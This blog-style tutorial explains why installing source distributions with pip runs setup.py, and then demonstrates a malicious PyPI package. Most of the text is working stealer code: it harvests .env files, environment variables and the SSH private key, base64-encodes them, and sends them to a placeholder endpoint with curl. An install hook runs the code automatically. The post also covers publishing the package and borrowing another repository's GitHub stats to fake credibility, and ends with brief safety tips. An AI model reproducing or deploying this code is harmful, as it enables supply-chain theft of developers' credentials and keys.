pip is a python package manager using which you can install, update and remove packages in your python environments. It comes very handy when you want to use open-source external libraries in your code.
You can pull/download python packages from Python Package Index (PyPI) and install the same with pip, or you can even use pip to install packages from the source code you have locally.
# install from pypi
pip install <package-name>
# or install from source code
pip install -e <path>
For example, to install a package called python-whois that is available at PyPI (https://pypi.org/project/python-whois/), you can execute the following command:
pip install python-whois
This will first download the package from PyPI and install the package.
What if I tell you that hackers can steal your critical assets (like API keys, SSH keys, passwords, etc) by just making you install a malicious package with pip?
That's right! A pip command as simple and innocent as pip install <package-name> can be very dangerous to you and your organization!
Let me explain in detail.
There are two scenarios when using pip to install an external package
Installing from a source distribution (.zip, .tar.gz, etc) - A source distribution is nothing but an archive that contains the source code of that particular package. When installing a package that offers only a source distribution, pip first downloads the source distribution, and then compiles it on your end by executing a setup.py script which then creates a wheel file (.whl) file from it. The package is finally installed from this .whl file.
Installing from a wheel (.whl) - A wheel can be considered as a compiled version of the python package. The package is compiled on the developer's end and wheels are already generated for that package. When installing a package that has pre-built wheels, the installation is much faster because the package is already compiled and it also avoids arbitrary code execution while installing the package because the setup.py is not required to be executed on the user's end.
The setup.py script
Every python package has a setup.py file in its root directory which contains the metadata of that package (package name, dependencies, license, description, etc) which are required when building a wheel file (.whl). It can also contain code that will be executed after the package is installed.
The setup.py will be executed when building the wheel (.whl) file. The problem arises when it is executed on the user's end because this results in arbitrary code execution on the user's machine. As discussed earlier, this only occurs when you are installing a package from a source distribution instead of a wheel file.
Obviously, this is an advantage for threat actors as they can write malicious code in their setup.py script and trick users to install their malicious packages.
And in fact, this has happened many times. One of the most recent incidents of malicious pip packages stealing developers' critical information is described here.
Let's write our own malicious python package
I will create a sample python package and include some malicious code in my setup.py to demonstrate how easy it is to implement.
Here is the project structure:
malicious-package
│ setup.py
│
└───src
└───test_average
average.py
__init__.py
I've created the setup.py script in the root directory.
In the "src" directory, I have a package named "test_average" which has a python program "average.py" .It contains a sample function that takes a list of integers as input and returns the average. The logic of this program doesn't matter, it is just for demo.
The __init__.py just tells that the corresponding folder (test_average) is to be treated as a package.
The contents of setup.py:
import setuptools
setuptools.setup(
name = "malicious-pip-package-for-demo",
version = "1.0.4",
author = "Malicious Actor",
author_email = "malactor@example.com",
description = "A test package to demonstrate malicious pip packages",
long_description = "long description",
long_description_content_type = "text/markdown",
url = "https://github.com/teja156/autobot-clipper",
project_urls = {
"Bug Tracker": "https://github.com/teja156/autobot-clipper/issues",
},
classifiers = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_dir = {"": "src"},
packages = setuptools.find_packages(where="src"),
python_requires = ">=3.6",
)
You can see that it defines the metadata of my sample project like the name, version, author, description, etc.
I will include some malicious code here that will steal:
All the environment variables
All .env files that contain project-specific environment variables
SSH private key located in ~/.ssh/id_rsa
Send all the stolen assets to an endpoint using cURL
def stealenv():
# Steal environment variables from shell and from .env
dotenv = ""
environs = {}
paths = []
if platform == "win32":
# Windows
# get all drives
available_drives = ['%s:' % d for d in string.ascii_uppercase if os.path.exists('%s:' % d)]
curr_dir = os.getcwd()
os.chdir("/")
for drive in available_drives:
powershell_cmd = "powershell.exe Get-ChildItem -Path %s -Filter *.env -Recurse -ErrorAction SilentlyContinue -Force -File | ForEach-Object {$_.FullName}"%(drive)
print(powershell_cmd)
powershell_cmd = powershell_cmd.split(" ")
try:
result = subprocess.run(powershell_cmd, capture_output=True, timeout=2)
output = result.stdout.decode()
output = output.split("\n")
if len(output)==0:
continue
for i in output:
i = i.rstrip()
paths.append(i)
except Exception as e:
continue
for i in paths:
if os.path.exists(i):
with open(i, "r") as f:
dotenv+=f.read()+"\n"
os.chdir(curr_dir)
else:
# Linux and Mac
home_path = str(Path.home())
cmd = f"find {home_path} -type f -name *.env"
cmd = cmd.split(" ")
try:
result = subprocess.run(cmd, capture_output=True, timeout=5)
output = result.stdout.decode().split("\n")
if len(output)==0:
return
for i in output:
i = i.rstrip()
paths.append(i)
except Exception as e:
pass
for i in paths:
if os.path.exists(i):
with open(i, "r") as f:
dotenv+=f.read()+"\n"
for name, value in os.environ.items():
environs[name] = value
try:
dotenv = base64.b64encode(dotenv.encode()).decode()
environs = base64.b64encode(str(environs).encode()).decode()
URL = "http://<IP_OF_ENDPOINT>"
req1 = f"{URL}/?dotenv={dotenv}"
req2 = f"{URL}/?environs={environs}"
subprocess.check_output(["curl",req1])
subprocess.check_output(["curl",req2])
except Exception as e:
pass
def stealsshkey():
home_path = str(Path.home())
privkey = ""
if not os.path.exists(os.path.join(home_path, ".ssh","id_rsa")):
return
with open(os.path.join(home_path, ".ssh","id_rsa"),"r") as f:
privkey = f.read()
if privkey=="" or privkey is None:
return
try:
privkey = base64.b64encode(privkey.encode()).decode()
URL = "http://<IP_OF_ENDPOINT>"
req = f"{URL}/?id_rsa={privkey}"
subprocess.check_output(["curl",req])
except Exception as e:
pass
I will now call these malicious functions in my setup.py script using the 'cmdclass' attribute so that they will be executed when the package is being installed.
import setuptools
from setuptools.command.install import install
class AfterInstall(install):
def run(self):
install.run(self)
stealenv()
stealsshkey()
setuptools.setup(
name = "malicious-pip-package-for-demo",
version = "1.0.4",
author = "Malicious Actor",
author_email = "malactor@example.com",
description = "A test package to demonstrate malicious pip packages",
long_description = "long description",
long_description_content_type = "text/markdown",
url = "https://github.com/teja156/autobot-clipper",
project_urls = {
"Bug Tracker": "https://github.com/teja156/autobot-clipper/issues",
},
classifiers = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_dir = {"": "src"},
packages = setuptools.find_packages(where="src"),
python_requires = ">=3.6",
cmdclass={
'install': AfterInstall,
},
)
The full code can be found on my Github
And that's it! I can now create a source distribution of this package with this command.
python setup.py sdist --formats=gztar
This will create a dist folder in the current directory and inside it is a .gz.tar file.
You can now upload this source distribution to PyPI by following these steps:
Create an account on PyPI.org
Install twine
pip install twine
Upload your project
twine upload dist/* --verbose
And your project is now on PyPI!
In the above image, you can see the GitHub statistics - my package has 47 stars, 18 Forks, and 2 PRS?!!
Well, that is because in my setup.py I have provided the URL of some other github repository, therefore the stats of that github repository are shown here. This is a great way for threat actors to trick users into thinking that their malicious package is famous and well-known in the open-source community but in reality, they are just impersonating some other open-source project's stats.
Let's test our malicious package
Now that our package is on PyPI we will be able to install it directly with pip.
You can see in the screenshot above, pip first downloaded the source distribution, executed the setup.py script, and built a wheel file out of it.
Anyway, now that the setup.py script is installed, let me check my endpoint where the stolen details are sent using cURL.
As you can see in the above picture, I have received three GET requests with some base64 encoded data. Let me decode them.
Decoded results:
In the above pictures, you can see the environment variables of one of my projects and my SSH private key. These are stolen by my malicious package when it is being installed and are sent to my HTTP endpoint. How scary is that?
How do you stay safe from malicious packages?
Simple,
Make sure you cross-check the GitHub repo linked to a PyPI package's page and verify it is what it claims it is.
Install packages from only wheel files and not from source distributions. You can use the --only-binary :all: flag with pip for the same.
Take some time to go through the actual source code of the package before installing it just to make sure it contains nothing malicious.
Comments